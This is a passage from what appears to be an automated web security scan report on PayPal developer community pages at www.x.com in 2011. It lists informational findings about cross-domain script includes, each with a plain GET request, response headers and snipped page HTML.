* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.39. https://www.x.com/community/ppx/global/sp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/sp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/sp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=120118 t=1313157075242154
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.40. https://www.x.com/community/ppx/global/uk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/uk

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/uk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034373b31342c323034343b31342c323034363b31342c323034353b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=132311 t=1313157075777765
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<div class="jive-i18nhtml-text-widget"><script src="http://widgets.twimg.com/j/2/widget.js" type="text/javascript"></script>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.41. https://www.x.com/community/ppx/ipn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ipn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/ipn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032383b31342c323032363b31342c323032373b31342c323032303b31342c323031383b31342c323036333b31342c323031373b31342c323030363b31342c323031363b31342c323234363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=93490 t=1313157061548233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.42. https://www.x.com/community/ppx/marketplaces  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/marketplaces

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/marketplaces HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134323b31342c323134353b31342c323134333b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=108959 t=1313157078551586
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.43. https://www.x.com/community/ppx/mass_pay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/mass_pay

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/mass_pay HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031313b31342c323030393b31342c323030373b31342c323030333b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=98932 t=1313157034722623
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.44. https://www.x.com/community/ppx/offlineanddevices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/offlineanddevices

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/offlineanddevices HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134363b31342c323134323b31342c323030353b31342c323134333b31342c323134353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=113532 t=1313157078857855
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.45. https://www.x.com/community/ppx/p2p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/p2p

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/p2p HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134343b31342c323134323b31342c323134333b31342c323134353b31342c323134363b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=81213 t=1313157079302842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.46. https://www.x.com/community/ppx/payflow_link  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_link

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/payflow_link HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:56 GMT; Path=/
Vary: User-Agent
JP: D=81349 t=1313157056540618
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.47. https://www.x.com/community/ppx/payflow_pro  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_pro

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/payflow_pro HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031343b31342c323030393b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=271432 t=1313157033322018
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.48. https://www.x.com/community/ppx/payflow_xml_reporting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_xml_reporting

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/payflow_xml_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032373b31342c323032303b31342c323032363b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=106498 t=1313157060903457
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.49. https://www.x.com/community/ppx/pdt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/pdt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/pdt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032393b31342c323033303b31342c323032303b31342c323032373b31342c323032383b31342c323036333b31342c323032363b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=122974 t=1313157061920177
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.50. https://www.x.com/community/ppx/permissions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/permissions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/permissions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032303b31342c323032363b31342c323031363b31342c323031373b31342c323030363b31342c323031383b31342c323036333b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=124196 t=1313157059978751
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.51. https://www.x.com/community/ppx/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/press

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/press HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134393b31342c323038323b31342c323030353b31342c323134363b31342c323134343b31342c323038363b31342c323134323b31342c323134333b31342c323134353b31342c323034373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=85690 t=1313157080601110
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.52. https://www.x.com/community/ppx/recurring_billing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_billing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/recurring_billing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031373b31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=113300 t=1313157058930963
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.53. https://www.x.com/community/ppx/recurring_payments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_payments

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/recurring_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=126727 t=1313157058403684
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.54. https://www.x.com/community/ppx/release_notes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/release_notes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/release_notes HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036343b31342c323033323b31342c323033373b31342c323032323b31342c323033303b31342c323032393b31342c323032383b31342c323036333b31342c323032373b31342c323032363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=126133 t=1313157064223215
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.55. https://www.x.com/community/ppx/sdks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/sdks

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/sdks HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
